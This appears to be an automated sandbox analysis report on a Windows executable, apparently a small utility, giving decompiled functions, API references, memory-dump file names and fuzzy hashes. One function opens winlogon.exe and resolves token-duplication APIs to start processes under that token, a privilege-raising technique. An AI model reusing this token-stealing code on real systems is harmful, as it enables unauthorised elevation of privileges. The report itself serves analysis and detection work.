0x00404dbf
0x00404dc6
0x00404dcc
0x00404dce
0x00404de1
0x00404deb
0x00404df2
0x00404df4
0x00404df4
0x00404e07
0x00404e0d
0x00404e18
0x00404e1c
0x00404e1e
0x00404e27
0x00404e28
0x00404e29
0x00404e2f
0x00404e31
0x00404e37
0x00404e41
0x00404e42
0x00404e43
0x00404e46
0x00404e46
0x00404e1c
0x00404e4d
0x00404e50
0x00404e5f
0x00404e66
0x00404e52
0x00404e52
0x00404e52
0x00404e6d
0x00404e70
0x00404e85
0x00404e85
0x00000000
0x00404e72
0x00404e7b
0x00404e80
0x00404e83
0x00404e87
0x00404e89
0x00404e8b
0x00404e8b
0x00404ea8
0x00404ea8
0x00000000
0x00404e83

APIs

GetSystemMetrics.USER32 ref: 00404DC2
GetSystemMetrics.USER32 ref: 00404DC8
GetDC.USER32(00000000), ref: 00404DD5
GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
ReleaseDC.USER32 ref: 00404DF4
GetWindowRect.USER32 ref: 00404E07
GetParent.USER32(?), ref: 00404E12
GetWindowRect.USER32 ref: 00404E2F
MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}

0x0040639c
0x004063a4
0x004063b2
0x004063c2
0x004063d3
0x004063dc
0x004063eb
0x004063f0
0x00406401
0x00000000
0x0040641e
0x0040641f

APIs

Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE

wcscpy.MSVCRT ref: 004063B2
wcscpy.MSVCRT ref: 004063C2
GetPrivateProfileIntW.KERNEL32 ref: 004063D3

Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30

Strings

charset, xrefs: 004063E1
TranslatorURL, xrefs: 0040640B
general, xrefs: 004063B7
rtl, xrefs: 004063CD
TranslatorName, xrefs: 004063F7

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-2039793938
Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}

0x0040adf6
0x0040adf8
0x0040adfa
0x0040adfb
0x0040adfb
0x0040ae02
0x00000000
0x00000000
0x0040ae04
0x0040ae05
0x0040ae6d
0x0040ae6e
0x0040ae73
0x0040ae76
0x0040ae7f
0x0040ae83
0x0040ae86
0x00000000
0x0040ae86
0x0040ae8f
0x0040ae0c
0x0040ae10
0x0040ae1e
0x0040ae3b
0x0040ae4a
0x0040ae65
0x0040ae7a
0x0040ae7e
0x0040ae67
0x0040ae67
0x0040ae68
0x00000000
0x0040ae68
0x0040ae4c
0x0040ae4c
0x0040ae4e
0x00000000
0x0040ae4e
0x0040ae3d
0x0040ae3d
0x0040ae3f
0x0040ae53
0x0040ae54
0x0040ae59
0x0040ae5c
0x0040ae5c
0x0040ae20
0x0040ae28
0x0040ae2d
0x0040ae30
0x0040ae30
0x0040ae12
0x0040ae12
0x0040ae13
0x00000000
0x0040ae13
0x00000000
0x0040ae10

APIs

memcpy.MSVCRT ref: 0040AE28
memcpy.MSVCRT ref: 0040AE54
memcpy.MSVCRT ref: 0040AE6E

Strings

>, xrefs: 0040AE13
<, xrefs: 0040AE05
&, xrefs: 0040AE4E
", xrefs: 0040AE22
<br>, xrefs: 0040AE68
°, xrefs: 0040AE3F

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF

Uniqueness

Uniqueness Score: -1.00%

Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}

0x004041f9
0x00404205
0x00404208
0x00404217
0x0040421e
0x00404236
0x0040423f
0x0040424a
0x0040425f
0x0040426b
0x0040426e
0x0040426e
0x00404275
0x004043be
0x004043ce
0x004043d0
0x004043d3
0x004043da
0x004043da
0x004043c0
0x004043c3
0x004043c3
0x0040427b
0x0040428c
0x0040428f
0x00404295
0x004042a5
0x004042b8
0x004042cb
0x004042de
0x004042f1
0x00404304
0x00404317
0x0040432a
0x0040433d
0x00404350
0x00404363
0x00404376
0x00404389
0x0040439c
0x004043a4
0x004043af
0x004043b5
0x004043b5
0x004043f5

APIs

memset.MSVCRT ref: 0040421E
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
DragFinish.SHELL32(?), ref: 0040423F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

BeginDeferWindowPos.USER32 ref: 0040427D
EndDeferWindowPos.USER32(?), ref: 004043A4
InvalidateRect.USER32(?,?,00000001), ref: 004043AF

Strings

$, xrefs: 004043CA

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
String ID: $
API String ID: 2142561256-3993045852
Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4

Uniqueness

Uniqueness Score: -1.00%

Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}

0x00405b81
0x00405b88
0x00405b8a
0x00405b8a
0x00405b8f
0x00405b96
0x00405b9b
0x00405bad
0x00405bad
0x00405b9d
0x00405b9d
0x00405ba8
0x00405bab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bab
0x00405be9
0x00405be9
0x00405baf
0x00405bb1
0x00405ce2
0x00405ce2
0x00405bb7
0x00405bbd
0x00405bf6
0x00405c4b
0x00405c4c
0x00405c52
0x00405c53
0x00000000
0x00405bf8
0x00405c02
0x00405c0e
0x00405c13
0x00405c18
0x00405c2c
0x00405c2e
0x00405c3b
0x00405c3c
0x00405c42
0x00000000
0x00405c1a
0x00405c25
0x00405c2a
0x00000000
0x00000000
0x00405c2a
0x00405c18
0x00405bbf
0x00405bc0
0x00405bcd
0x00405bce
0x00405bd7
0x00405c58
0x00405c5f
0x00405c61
0x00405c61
0x00405c63
0x00405cdb
0x00405cdb
0x00405c65
0x00405c65
0x00405c74
0x00000000
0x00405c84
0x00405c8a
0x00405c8d
0x00405c99
0x00405caf
0x00405cbd
0x00405cc8
0x00405cd4
0x00405cd9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cd9
0x00405c74
0x00405c63
0x00405ce6

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
wcscpy.MSVCRT ref: 00405C02

Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE

wcslen.MSVCRT ref: 00405C20
GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73

Strings

strings, xrefs: 00405BF8

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}

0x00401e59
0x00401e5c
0x00401e64
0x00401e67
0x00401ef9
0x00401e6d
0x00401e70
0x00401e76
0x00401e79
0x00401e7e
0x00401e83
0x00401e92
0x00401e85
0x00401e8e
0x00401e8e
0x00401e96
0x00401ee6
0x00401e98
0x00401e9b
0x00401e9e
0x00401ea3
0x00401ea8
0x00401ebb
0x00401eaa
0x00401eb7
0x00401eb7
0x00401ebf
0x00401ed3
0x00401ec1
0x00401ec7
0x00401ec9
0x00401ec9
0x00401ed8
0x00401ed8
0x00401eeb
0x00401eeb
0x00401f01

APIs

OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3

Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

Strings

winlogon.exe, xrefs: 00401E4B

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
String ID: winlogon.exe
API String ID: 1315556178-961692650
Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}

0x00405241
0x00405250
0x00405257
0x0040525f
0x00405262
0x00405265
0x00405268
0x0040526f
0x0040526f
0x00405277
0x00405277
0x0040527a
0x0040527f
0x00405284
0x00405285
0x00405291
0x00405296
0x004052a9
0x004052b3
0x004052b7
0x004052bc
0x004052ca
0x004052d2
0x004052d5
0x004052d8
0x004052d8
0x004052db
0x004052db
0x004052e1
0x004052e4
0x004052e8
0x004052f2

APIs

memset.MSVCRT ref: 00405257
_snwprintf.MSVCRT ref: 00405285
wcslen.MSVCRT ref: 00405291
memcpy.MSVCRT ref: 004052A9
wcslen.MSVCRT ref: 004052B7
memcpy.MSVCRT ref: 004052CA

Strings

%s (%s), xrefs: 0040527A

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)
API String ID: 3979103747-1363028141
Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}

0x00406157
0x0040616d
0x00406174
0x0040617f
0x00406185
0x00406196
0x0040619e
0x004061b6
0x004061bd
0x004061d4
0x004061da
0x004061e0
0x004061e5
0x004061e6
0x004061ef
0x004061f9
0x004061ff
0x004061ef
0x00406206

APIs

memset.MSVCRT ref: 00406174
GetDlgCtrlID.USER32 ref: 0040617F
GetWindowTextW.USER32 ref: 00406196
memset.MSVCRT ref: 004061BD
GetClassNameW.USER32 ref: 004061D4
_wcsicmp.MSVCRT ref: 004061E6

Part of subcall function 00406025: memset.MSVCRT ref: 00406038
Part of subcall function 00406025: _itow.MSVCRT ref: 00406046

Strings

sysdatetimepick32, xrefs: 004061E0

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
librarywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

